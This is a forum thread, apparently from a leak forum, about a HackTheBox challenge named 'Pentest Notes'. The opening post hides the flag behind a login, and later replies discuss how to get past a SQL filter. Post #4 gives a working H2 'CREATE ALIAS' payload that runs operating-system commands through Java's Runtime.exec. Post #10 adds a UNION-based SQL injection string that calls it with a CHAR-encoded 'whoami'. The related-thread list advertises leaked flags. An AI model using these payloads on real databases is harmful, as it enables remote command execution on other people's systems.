Pentest Notes Hackthebox Challenge flag
by trevor69000 - Sunday October 27, 2024 at 07:17 AM
#1
flag
Hidden Content
You must register or login to view this content.
Reply
#2
Will be interesting
Reply
#3
you should better explain how to bypass filter for $$ and CONCAT instead of just flag
Reply
#4
(10-27-2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a `$`
CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';
Reply
#5
Will be interesting
Ban reason: Replying With Hidden Content (Permanent)
Reply
#6
(10-27-2024, 07:17 AM)trevor69000 Wrote: flag

do you have a walkthrough for this ?
Reply
#7
Thanks for sharing!!!!!!!!
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#8
how can i turn the SQLi into  a way to get the flag
Reply
#9
Using the alias created to read files in OS
Reply
#10
(10-27-2024, 08:12 PM)mazafaka555 Wrote:
(10-27-2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a  `$`
CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';


How can I then use the alias? I'm trying something like: 
SQL Injection' OR 1=0 UNION SELECT EXECVE(CHAR(119) + CHAR(104) + CHAR(111) + CHAR(97) + CHAR(109) + CHAR(105)) -- -
to bypass CONCAT but I don't get it to work :/
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 365 113,336 Yesterday, 07:30 PM
Last Post: N1GHTC0D3
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 94 26,221 08-21-2026, 06:20 AM
Last Post: jamoski
  [Free] CDSA Path Flag -All RoanokeYehia 36 20,859 08-16-2026, 01:59 AM
Last Post: PreferencesY
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 22 19,442 08-15-2026, 06:50 PM
Last Post: zl4
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 603 118,025 08-15-2026, 06:00 PM
Last Post: zl4



 Users browsing this thread: 1 Guest(s)